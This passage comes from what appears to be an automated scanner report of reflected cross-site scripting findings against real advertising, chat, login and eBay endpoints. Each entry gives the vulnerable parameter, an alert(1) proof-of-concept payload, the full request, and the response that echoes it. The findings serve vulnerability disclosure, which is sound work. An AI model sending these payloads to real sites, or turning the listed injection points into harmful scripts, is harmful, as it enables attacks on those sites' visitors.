HTTP/1.1 200 OK.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE";function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._i...[SNIP]... >CollectiveMedia.createAndAttachAd("wfm-30121707243_1316190632","http://ad.doubleclick.net/adjb3e20'-alert(1)-'8c1518f6d09 /ds.home/default;net=wfm;u=ds,wfm-30121707243_1316190632,121773f9380f32f,dshp,wfm.dshp_h-wfm.health_l-cm.polit_l-cm.health_l;;ugc=0;!c=ds;sz=300x250;ux=2ee636e8-ffbb-4707-83f7-1e5c10da5819;pos=top;dcop...[SNIP]...
2.6. http://a.collective-media.net/cmadj/ds.home/default [REST URL parameter 2]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://a.collective-media.net
Path:
/cmadj/ds.home/default
Issue detail
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload da4da'-alert(1)-'89b82744ef9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cmadj/ds.homeda4da'-alert(1)-'89b82744ef9 /default;cmn=wfm;ugc=0;!c=ds;sz=300x250;ux=2ee636e8-ffbb-4707-83f7-1e5c10da5819;pos=top;u=ds;dcopt=ist;ptile=1;s=ds.home;z=default;net=wfm;ord=110916093024416?;ord1=216411;cmpgurl=http%253A//www.drugstore.com/? HTTP/1.1;q=0.7
Response
HTTP/1.1 200 OK.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE";function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._i...[SNIP]... >CollectiveMedia.createAndAttachAd("wfm-30519001628_1316190633","http://ad.doubleclick.net/adj/ds.homeda4da'-alert(1)-'89b82744ef9 /default;net=wfm;u=ds,wfm-30519001628_1316190633,121773f9380f32f,health,wfm.dshp_h-wfm.health_l-cm.polit_l-cm.health_l;;ugc=0;!c=ds;sz=300x250;ux=2ee636e8-ffbb-4707-83f7-1e5c10da5819;pos=top;dcopt=ist;...[SNIP]...
2.7. http://a.collective-media.net/cmadj/ds.home/default [REST URL parameter 3]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://a.collective-media.net
Path:
/cmadj/ds.home/default
Issue detail
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 38ef6'-alert(1)-'c2fc6974a7b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cmadj/ds.home/default38ef6'-alert(1)-'c2fc6974a7b ;cmn=wfm;ugc=0;!c=ds;sz=300x250;ux=2ee636e8-ffbb-4707-83f7-1e5c10da5819;pos=top;u=ds;dcopt=ist;ptile=1;s=ds.home;z=default;net=wfm;ord=110916093024416?;ord1=216411;cmpgurl=http%253A//www.drugstore.com/? HTTP/1.1;q=0.7
Response
HTTP/1.1 200 OK.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE";function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._i...[SNIP]... >CollectiveMedia.createAndAttachAd("wfm-30510327174_1316190633","http://ad.doubleclick.net/adj/ds.home/default38ef6'-alert(1)-'c2fc6974a7b ;net=wfm;u=ds,wfm-30510327174_1316190633,121773f9380f32f,health,wfm.dshp_h-wfm.health_m-cm.polit_l-cm.health_l-cm.educat_l;;ugc=0;!c=ds;sz=300x250;ux=2ee636e8-ffbb-4707-83f7-1e5c10da5819;pos=top;dcopt=...[SNIP]...
2.8. http://a.collective-media.net/cmadj/ds.home/default [cmn parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://a.collective-media.net
Path:
/cmadj/ds.home/default
Issue detail
The value of the cmn request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 61e7d'-alert(1)-'f129e51cc13 was submitted in the cmn parameter. This input was echoed unmodified in the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cmadj/ds.home/default;cmn=61e7d'-alert(1)-'f129e51cc13 HTTP/1.1;q=0.7
Response
HTTP/1.1 200 OK.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE":function(a){return Math.floor(Math.random()*a)},appendChild:function(a,b){if(null==a.canHaveChildren||a.canHaveChildren){a.appendChild(document.crea...[SNIP]... >CollectiveMedia.createAndAttachAd("61e7d'-alert(1)-'f129e51cc13 -30300231480_1316190632","http://ad.doubleclick.net/adj/ds.home/default;net=61e7d'-alert(1)-'f129e51cc13;u=,61e7d'-alert(1)-'f129e51cc13-30300231480_1316190632,121773f9380f32f,dshp,cm.polit_l-cm.health...[SNIP]...
2.9. http://event.adxpose.com/event.flow [uid parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://event.adxpose.com
Path:
/event.flow
Issue detail
The value of the uid request parameter is copied into the HTML document as plain text between tags. The payload d1dc5<script>alert(1)</script>4c4547dbd5e was submitted in the uid parameter. This input was echoed unmodified in the application's response.
Request
GET /event.flow?eventcode=000_000_12&location=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Fpagead%2Fads%3Fclient%3Dca-pub-3796773913386149%26output%3Dhtml%26h%3D250%26slotname%3D1161958565%26w%3D300%26lmt%3D1316226341%26flash%3D10.3.183%26url%3Dhttp%253A%252F%252Fportal.opera.com%252Fportal%252Ftabs%252F%253Ftab_name%253DNews%26dt%3D1316208341657%26bpp%3D148%26shv%3Dr20110907%26jsv%3Dr20110914%26correlator%3D1316208341881%26frm%3D4%26adk%3D265923585%26ga_vid%3D1095286181.1316208009%26ga_sid%3D1316208009%26ga_hid%3D320694430%26ga_fc%3D1%26u_tz%3D-300%26u_his%3D2%26u_java%3D1%26u_h%3D1200%26u_w%3D1920%26u_ah%3D1156%26u_aw%3D1920%26u_cd%3D16%26u_nplug%3D20%26u_nmime%3D100%26dff%3Darial%26dfs%3D12%26adx%3D739%26ady%3D181%26biw%3D1131%26bih%3D870%26eid%3D36887102%26ref%3Dhttp%253A%252F%252Fportal.opera.com%252F%26prodhost%3Dgoogleads.g.doubleclick.net%26fu%3D0%26ifi%3D1%26dtd%3D240%26xpc%3DNxfq0ro1Gs%26p%3Dhttp%253A%2F%2Fportal.opera.com&uid=TVYMYp4lQTRs9JsS_40691941d1dc5<script>alert(1)</script>4c4547dbd5e &xy=0%2C0&wh=300%2C250&vchannel=59371577&cid=3941858&iad=1316208343619-68901827069930740&cookieenabled=1&screenwh=1920%2C1200&adwh=300%2C250&colordepth=16&flash=10.3&iframed=1 HTTP/1.1.doubleclick.net/pagead/ads?client=ca-pub-3796773913386149&output=html&h=250&slotname=1161958565&w=300&lmt=1316226341&flash=10.3.183&url=http%3A%2F%2Fportal.opera.com%2Fportal%2Ftabs%2F%3Ftab_name%3DNews&dt=1316208341657&bpp=148&shv=r20110907&jsv=r20110914&correlator=1316208341881&frm=4&adk=265923585&ga_vid=1095286181.1316208009&ga_sid=1316208009&ga_hid=320694430&ga_fc=1&u_tz=-300&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=20&u_nmime=100&dff=arial&dfs=12&adx=739&ady=181&biw=1131&bih=870&eid=36887102&ref=http%3A%2F%2Fportal.opera.com%2F&prodhost=googleads.g.doubleclick.net&fu=0&ifi=1&dtd=240&xpc=Nxfq0ro1Gs&p=http%3A//portal.opera.com;q=0.3-9b1f-be5afaba100a
Response
HTTP/1.1 200 OKA29D743642F6E40D86D8E18; Path=/=UTF-8"TVYMYp4lQTRs9JsS_40691941d1dc5<script>alert(1)</script>4c4547dbd5e ");
2.10. http://livechat.iadvize.com/rpc/referrer.php [get parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://livechat.iadvize.com
Path:
/rpc/referrer.php
Issue detail
The value of the get request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ffdf0'%3balert(1)//e383b46113a was submitted in the get parameter. This input was echoed as ffdf0';alert(1)//e383b46113a in the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /rpc/referrer.php?s=1821&get=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dsmtp%2Bserverffdf0'%3balert(1)//e383b46113a &random=1316204846918 HTTP/1.1/features/smtp-relay-service.html?gclid=CKqV0feJoqsCFQdzgwod6j2wjw;q=0.3aeffd3c6b449e3ce04e736ab952c62; 1821vvc=1; 1821_idzp=%7B%22site_id%22%3A1821%2C%22chatcount%22%3A0%2C%22nbrVisite%22%3A0%2C%22country%22%3Anull%2C%22country_name%22%3A%22%22%2C%22city%22%3A%22%22%2C%22lat%22%3Anull%2C%22long%22%3Anull%2C%22lang%22%3A%22en%22%2C%22visitorname%22%3A%22+%22%2C%22extID%22%3Anull%2C%22pageview%22%3A1%2C%22connectionTime%22%3A1316186809%2C%22navTime%22%3A1000%7D; 1821_idz=Wlkt70s3xZ6riGI4fumNJq%2FupYB8lAU%2F73%2Frx%2BlKcWm%2BPxOTMJA9USWEgtoWccdSkDkxnLE7JXOsJw5mlMEkzorVTslVkO%2BKndGjVRzv9ddZiIASn0aiI417pqnen2C%2BPCawyns5jF7t%2BJ6yDefIW%2BIt7Q4Z
Response
HTTP/1.1 200 OK/livechat.iadvize.com/w3c/p3p.xml", CP="NID DSP NON COR"%22%3A1821%2C%22chatcount%22%3A0%2C%22nbrVisite%22%3A0%2C%22country%22%3Anull%2C%22country_name%22%3A%22%22%2C%22city%22%3A%22%22%2C%22lat%22%3Anull%2C%22long%22%3Anull%2C%22lang%22%3A%22en%22%2C%22visitorname%22%3A%22+%22%2C%22extID%22%3Anull%2C%22pageview%22%3A12%2C%22connectionTime%22%3A1316186809%2C%22navTime%22%3A34000%2C%22origin_site%22%3A%22http%3A%5C%2F%5C%2Fwww.google.com%5C%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dsmtp+serverffdf0%27%3Balert%281%29%5C%2F%5C%2Fe383b46113a%22%2C%22origin%22%3A%22search+engine%22%2C%22refengine%22%3A%22Google%22%2C%22refkeyword%22%3A%22smtp+serverffdf0%27%3Balert%281%29%5C%2F%5C%2Fe383b46113a%22%2C%22referrer_lastPage%22%3A%22http%3A%5C%2F%5C%2Fwww.google.com%5C%2Fsearch%3Fhl%3Den%26q%3D%250031c47%3Ca%2520b%253dc%3Ed77f287482c%22%2C%22timeElapsed%22%3A0.57%7D; path=/_site'] = 'http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=smtp serverffdf0';alert(1)//e383b46113a ';iAdvize.vStats['origin'] = 'search engine';iAdvize.vStats['refengine'] = 'Google';iAdvize.vStats['refkeyword'] = 'smtp serverffdf0';alert(1)//e383b46113a';iAdvize.util.delScript('referrer');
2.11. http://livechat.iadvize.com/rpc/referrer.php [get parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://livechat.iadvize.com
Path:
/rpc/referrer.php
Issue detail
The value of the get request parameter is copied into the HTML document as plain text between tags. The payload a5deb<script>alert(1)</script>cbf95be69eb was submitted in the get parameter. This input was echoed unmodified in the application's response.
Request
GET /rpc/referrer.php?s=1821&get=a5deb<script>alert(1)</script>cbf95be69eb &random=1316204846918 HTTP/1.1/features/smtp-relay-service.html?gclid=CKqV0feJoqsCFQdzgwod6j2wjw;q=0.3aeffd3c6b449e3ce04e736ab952c62; 1821vvc=1; 1821_idzp=%7B%22site_id%22%3A1821%2C%22chatcount%22%3A0%2C%22nbrVisite%22%3A0%2C%22country%22%3Anull%2C%22country_name%22%3A%22%22%2C%22city%22%3A%22%22%2C%22lat%22%3Anull%2C%22long%22%3Anull%2C%22lang%22%3A%22en%22%2C%22visitorname%22%3A%22+%22%2C%22extID%22%3Anull%2C%22pageview%22%3A1%2C%22connectionTime%22%3A1316186809%2C%22navTime%22%3A1000%7D; 1821_idz=Wlkt70s3xZ6riGI4fumNJq%2FupYB8lAU%2F73%2Frx%2BlKcWm%2BPxOTMJA9USWEgtoWccdSkDkxnLE7JXOsJw5mlMEkzorVTslVkO%2BKndGjVRzv9ddZiIASn0aiI417pqnen2C%2BPCawyns5jF7t%2BJ6yDefIW%2BIt7Q4Z
Response
HTTP/1.1 200 OK/livechat.iadvize.com/w3c/p3p.xml", CP="NID DSP NON COR"%22%3A1821%2C%22chatcount%22%3A0%2C%22nbrVisite%22%3A0%2C%22country%22%3Anull%2C%22country_name%22%3A%22%22%2C%22city%22%3A%22%22%2C%22lat%22%3Anull%2C%22long%22%3Anull%2C%22lang%22%3A%22en%22%2C%22visitorname%22%3A%22+%22%2C%22extID%22%3Anull%2C%22pageview%22%3A12%2C%22connectionTime%22%3A1316186809%2C%22navTime%22%3A34000%2C%22origin_site%22%3A%22a5deb%3Cscript%3Ealert%281%29%3C%5C%2Fscript%3Ecbf95be69eb%22%2C%22origin%22%3A%22website%22%2C%22refengine%22%3A%22%22%2C%22refkeyword%22%3A%22%22%2C%22referrer_lastPage%22%3A%22http%3A%5C%2F%5C%2Fwww.google.com%5C%2Fsearch%3Fhl%3Den%26q%3D%250031c47%3Ca%2520b%253dc%3Ed77f287482c%22%2C%22timeElapsed%22%3A0.57%7D; path=/_site'] = 'a5deb<script>alert(1)</script>cbf95be69eb ';iAdvize.vStats['origin'] = 'website';iAdvize.vStats['refengine'] = '';iAdvize.vStats['refkeyword'] = '';iAdvize.util.delScript('referrer');
2.12. https://login.secureserver.net/js.php [name of an arbitrarily supplied request parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
https://login.secureserver.net
Path:
/js.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 56880'-alert(1)-'92e88d0f44b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /js.php?group=main&r=1.34&56880'-alert(1)-'92e88d0f44b =1 HTTP/1.1server.net/?app=wbe;q=0.3
Response
HTTP/1.1 200 OKd2e22a1730208a6aae8ac0133dd2e22a1730208a6aae8ac0133d...[SNIP]... ).remoteCall("Pass","validateName",Ajax.args(arguments),this.__listener);};=main&r=1.34&56880'-alert(1)-'92e88d0f44b =1'] = 1;
2.13. https://login.secureserver.net/js.php [r parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
https://login.secureserver.net
Path:
/js.php
Issue detail
The value of the r request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6e4ab'-alert(1)-'bd22409da8a was submitted in the r parameter. This input was echoed unmodified in the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /js.php?group=main&r=1.346e4ab'-alert(1)-'bd22409da8a HTTP/1.1server.net/?app=wbe;q=0.3
Response
HTTP/1.1 200 OKd2e22a1730208a6aae8ac0133d...[SNIP]... ).remoteCall("Pass","validateName",Ajax.args(arguments),this.__listener);};=main&r=1.346e4ab'-alert(1)-'bd22409da8a '] = 1;
2.14. http://rover.ebay.com/ar/1/711-53200-19255-108/1 [REST URL parameter 3]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://rover.ebay.com
Path:
/ar/1/711-53200-19255-108/1
Issue detail
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 268ae'-alert(1)-'7ee8b452bb0 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ar/1/711-53200-19255-108268ae'-alert(1)-'7ee8b452bb0 /1?campid=5336830850&toolid=7115320019255108&customid=&mpt=206427233991&adtype=3&size=300x250&mpvc= HTTP/1.1;q=0.354388197505092ad^cguid/62d7951f1320a479e7268c86ff361dd1505092ad^
Response
HTTP/1.1 200 OK*ts67.03%3F53%604-132730a3a4a543881975054aada^cguid/62d7951f1320a479e7268c86ff361dd15054aada^; Domain=.ebay.com; Expires=Sat, 15-Sep-2012 16:20:42 GMT; Path=/.com/rover/1/711-53200-19255-108268ae'-alert(1)-'7ee8b452bb0 /1"><img border=0 src="http://pics.ebaystatic.com/aw/pics/im/default_300x250.jpg" ><...[SNIP]...
2.15. http://rover.ebay.com/ar/1/711-53200-19255-108/1 [mpvc parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://rover.ebay.com
Path:
/ar/1/711-53200-19255-108/1
Issue detail
The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d6612'%3balert(1)//4069d253df3 was submitted in the mpvc parameter. This input was echoed as d6612';alert(1)//4069d253df3 in the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ar/1/711-53200-19255-108/1?campid=5336830850&toolid=7115320019255108&customid=&mpt=206427233991&adtype=3&size=300x250&mpvc=d6612'%3balert(1)//4069d253df3 HTTP/1.1;q=0.354388197505092ad^cguid/62d7951f1320a479e7268c86ff361dd1505092ad^
Response
HTTP/1.1 200 OK*ts67.17d%3Aa5%3E-132730a22e0543881975054aad4^cguid/62d7951f1320a479e7268c86ff361dd15054aad4^; Domain=.ebay.com; Expires=Sat, 15-Sep-2012 16:20:36 GMT; Path=/d6612';alert(1)//4069d253df3 http://rover.ebay.com/rover/1/711-53200-19255-108/1?mpt=206427233991&toolid=7115320019255108&customid=&campid=5336830850&rvr_id=265435447058&imp_rvr_id=265435447058">...[SNIP]...
2.16. http://rover.ebay.com/ar/1/711-53200-19255-108/1 [name of an arbitrarily supplied request parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://rover.ebay.com
Path:
/ar/1/711-53200-19255-108/1
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a4a5a'%3balert(1)//f65caf493c2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a4a5a';alert(1)//f65caf493c2 in the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ar/1/711-53200-19255-108/1?campid=5336830850&toolid=7115320019255108&customid=&mpt=206427233991&adtype=3&size=300x250&mpvc=&a4a5a'%3balert(1)//f65caf493c2 =1 HTTP/1.1;q=0.354388197505092ad^cguid/62d7951f1320a479e7268c86ff361dd1505092ad^
Response
HTTP/1.1 200 OK*ts67.d3117d7-132730a2a00543881975054aad6^cguid/62d7951f1320a479e7268c86ff361dd15054aad6^; Domain=.ebay.com; Expires=Sat, 15-Sep-2012 16:20:38 GMT; Path=/.com/rover/1/711-53200-19255-108/1?mpt=206427233991&toolid=7115320019255108&a4a5a';alert(1)//f65caf493c2 =1&campid=5336830850&customid=&rvr_id=265440909658&imp_rvr_id=265440909658&mpvc=">...[SNIP]...
2.17. http://srv.healthheadlines.com/s.php [k parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://srv.healthheadlines.com
Path:
/s.php
Issue detail
The value of the k request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 80caa"><script>alert(1)</script>1eb42bee5e8 was submitted in the k parameter. This input was echoed unmodified in the application's response.
Request
GET /s.php?c=51&d=9&t=0.08053325628861785&n=1133000173&k=http://yads.zedo.com/ads2/c?a=947253;x=2304;g=172;c=1133000173,1133000173;i=0;n=1133;i=0;u=k5xiThcyanucBq9IXvhSGSz5~090311;1=8;2=1;e=i;s=24;g=172;w=47;m=82;z=0.8216961014550179;p=6;f=1160000;h=1021994;k=http%3A//adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBEX0mCndzTsf0DcOJgALUrb3-BsL17uACur-rqCqi06q2TaCNBhABGAEgsLnXBjgAUIWt2Zv9_____wFgyQagAY6tjM0DsgEQcG9ydGFsLm9wZXJhLmNvbboBCjMwMHgyNTBfYXPIAQnaARhodHRwOi8vcG9ydGFsLm9wZXJhLmNvbS-4AhjAAgHIApqHwSCoAwHoA6UB6AMQ6AONA_UDAAgAAPUDMgCAAaAGEQ%26num%3D1%26sig%3DAOD64_2ztssrmiGfz4QREAFMwUEJdXtTPw%26client%3Dca-pub-3796773913386149%26adurl%3D80caa"><script>alert(1)</script>1eb42bee5e8 HTTP/1.1/ff2.html?n=1133;c=173;s=24;d=9;w=300;h=250;l=http://adclick.g.doubleclick.net/aclk?sa=l&ai=BEX0mCndzTsf0DcOJgALUrb3-BsL17uACur-rqCqi06q2TaCNBhABGAEgsLnXBjgAUIWt2Zv9_____wFgyQagAY6tjM0DsgEQcG9ydGFsLm9wZXJhLmNvbboBCjMwMHgyNTBfYXPIAQnaARhodHRwOi8vcG9ydGFsLm9wZXJhLmNvbS-4AhjAAgHIApqHwSCoAwHoA6UB6AMQ6AONA_UDAAgAAPUDMgCAAaAGEQ&num=1&sig=AOD64_2ztssrmiGfz4QREAFMwUEJdXtTPw&client=ca-pub-3796773913386149&adurl=/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3
Response
HTTP/1.1 200 OKBRE1BQUFBSkFBQUFOUUFBQU1nQUFBQVdBQUFCaGdBQUFCd0FBQURCQUFBQXxaQUFBQUJ3QUFBUDJBQUFBSWdBQUFQY0FBQUVzQUFBQUZBQUFBOEFBQUFBYUFBQUJEdz09fHx8MXwxMzE2MTkwMDQ2; path=/; domain=.healthheadlines.com; httponly/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type...[SNIP]... YXPIAQnaARhodHRwOi8vcG9ydGFsLm9wZXJhLmNvbS-4AhjAAgHIApqHwSCoAwHoA6UB6AMQ6AONA_UDAAgAAPUDMgCAAaAGEQ&num=1&sig=AOD64_2ztssrmiGfz4QREAFMwUEJdXtTPw&client=ca-pub-3796773913386149&adurl=80caa"><script>alert(1)</script>1eb42bee5e8 http://srv2.healthheadlines.com/t.php?e=90186&a=AIvJnAAAADMAAAAJAAAANQAAAMgAAAAWAAABhgAAABwAAADBAAAA&b=ZAAAABwAAAP2AAAAIgAAAPcAAAEsAAAAFAAAA8AAAAAaAAABDw%3D%3D&t=0&i=7&r=http%3A%2F%2Fwww.PeakLife.com%2...[SNIP]...
2.18. http://srv.healthheadlines.com/s.php [name of an arbitrarily supplied request parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://srv.healthheadlines.com
Path:
/s.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ad039"><script>alert(1)</script>54339ecbce9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
Request
GET /s.php?c=51&d=9&t=0.08053325628861785&n=1133000173&k=http://yads.zedo.com/ads2/c?a=947253;x=2304;g=172;c=1133000173,1133000173;i=0;n=1133;i=0;u=k5xiThcyanucBq9IXvhSGSz5~090311;1=8;2=1;e=i;s=24;g=172;w=47;m=82;z=0.8216961014550179;p=6;f=1160000;h=1021994;k=http%3A//adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBEX0mCndzTsf0DcOJgALUrb3-BsL17uACur-rqCqi06q2TaCNBhABGAEgsLnXBjgAUIWt2Zv9_____wFgyQagAY6tjM0DsgEQcG9ydGFsLm9wZXJhLmNvbboBCjMwMHgyNTBfYXPIAQnaARhodHRwOi8vcG9ydGFsLm9wZXJhLmNvbS-4AhjAAgHIApqHwSCoAwHoA6UB6AMQ6AONA_UDAAgAAPUDMgCAAaAGEQ%26num%3D1%26sig%3DAOD64_2ztssrmiGfz4QREAFMwUEJdXtTPw%26client%3Dca-pub-3796773913386149%26adur/ad039"><script>alert(1)</script>54339ecbce9 l%3D HTTP/1.1/ff2.html?n=1133;c=173;s=24;d=9;w=300;h=250;l=http://adclick.g.doubleclick.net/aclk?sa=l&ai=BEX0mCndzTsf0DcOJgALUrb3-BsL17uACur-rqCqi06q2TaCNBhABGAEgsLnXBjgAUIWt2Zv9_____wFgyQagAY6tjM0DsgEQcG9ydGFsLm9wZXJhLmNvbboBCjMwMHgyNTBfYXPIAQnaARhodHRwOi8vcG9ydGFsLm9wZXJhLmNvbS-4AhjAAgHIApqHwSCoAwHoA6UB6AMQ6AONA_UDAAgAAPUDMgCAAaAGEQ&num=1&sig=AOD64_2ztssrmiGfz4QREAFMwUEJdXtTPw&client=ca-pub-3796773913386149&adurl=/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3
Response
HTTP/1.1 200 OKBRE1BQUFBSkFBQUFVd0FBQU1nQUFBQWlBQUFDTUFBQUFDa0FBQUVmQUFBQXxaQUFBQURBQUFBUllBQUFBT3dBQUFlSUFBQUVzQUFBQUZBQUFCSkFBQUFBYUFBQUJEdz09fHx8MXwxMzE2MTkwMDQ4; path=/; domain=.healthheadlines.com; httponly/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type...[SNIP]... fYXPIAQnaARhodHRwOi8vcG9ydGFsLm9wZXJhLmNvbS-4AhjAAgHIApqHwSCoAwHoA6UB6AMQ6AONA_UDAAgAAPUDMgCAAaAGEQ&num=1&sig=AOD64_2ztssrmiGfz4QREAFMwUEJdXtTPw&client=ca-pub-3796773913386149&adur/ad039"><script>alert(1)</script>54339ecbce9 l=http://srv2.healthheadlines.com/t.php?e=90186&a=AIvJnAAAADMAAAAJAAAAUwAAAMgAAAAiAAACMAAAACkAAAEfAAAA&b=ZAAAADAAAARYAAAAOwAAAeIAAAEsAAAAFAAABJAAAAAaAAABDw%3D%3D&t=0&i=7&r=http%3A%2F%2Fwww.PeakLife.com...[SNIP]...
2.19. http://t.tellapart.com/hif [p parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://t.tellapart.com
Path:
/hif
Issue detail
The value of the p request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bd591"%3balert(1)//e15fc9eb3e7 was submitted in the p parameter. This input was echoed as bd591";alert(1)//e15fc9eb3e7 in the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /hif?p=vobmfNYCXJkpXrtb_UNRwyPDtCMLAAEAAAAQ8VfMRuCtWlGZKHGOFgAdYAsAAgAAABDBNWrL_D1gZ_QvSD7Ubh68CgADAAABMnMTUeAPAAQLAAAABAAAAAI5OQAAAAI3NQAAAAI3NAAAAAMxMDULAAUAAAAMZ01JVlhQT2pId09LAA==bd591"%3balert(1)//e15fc9eb3e7 &tms=1316208686167 HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.7O1GhjWGagkBZ8cNX0k4oxPsv8LF9nJWKu12mbgkeBMt_o6CvAURFeGEBSF8UxpLeFjWV5Q2eOlAeV7yVQxxfhVQ6n7tXCCk-3AaAr-3DeDS9cBGOjMik-CONnHvyl4pD3SI4onQ1Vx5D2OKkZQcrsaYTa28GPXtJ-72-twAilquinwVbDX2VnkhBOx2C9B; __cmbGU=ABJeb1_3NV-wS9CA4xNFiv3ShLSU4iGgty4u6k9WHsPFv60ohMiFdyhiaxwr6ZVfLN137aUZJTCXZJufx_taXD_Nnqj8E6TcGg; AWSELB=E31F5987121C4E93C56CFAE300CB3FAA8458B8275ED54EFB1FBFC3259C68A4A477202DDBEDB9857088204A944F7B0E0B304C51662855C88DA4DD00256DCA9F810994CC9BEC
Response
HTTP/1.1 200 OK-EVGLVaaj4nEPAAEMAAAABAsAAQAAAAI5OQoAAwAAATJzE6dmAAsAAQAAAAI3NQoAAwAAATJzE6dmAAsAAQAAAAI3NAoAAwAAATJzE6dmAAsAAQAAAAMxMDUKAAMAAAEycxOnZgAA; expires=Wed, 14-Mar-2012 16:31:00 GMT; Path=/; Domain=.tellapart.com...[SNIP]... _UNRwyPDtCMLAAEAAAAQ8VfMRuCtWlGZKHGOFgAdYAsAAgAAABDBNWrL_D1gZ_QvSD7Ubh68CgADAAABMnMTUeAPAAQLAAAABAAAAAI5OQAAAAI3NQAAAAI3NAAAAAMxMDULAAUAAAAMZ01JVlhQT2pId09LAA==bd591";alert(1)//e15fc9eb3e7 ");...[SNIP]...
2.20. http://widgets.digg.com/buttons/count [url parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://widgets.digg.com
Path:
/buttons/count
Issue detail
The value of the url request parameter is copied into the HTML document as plain text between tags. The payload 5851e<script>alert(1)</script>9bc50613a06 was submitted in the url parameter. This input was echoed unmodified in the application's response.
Request
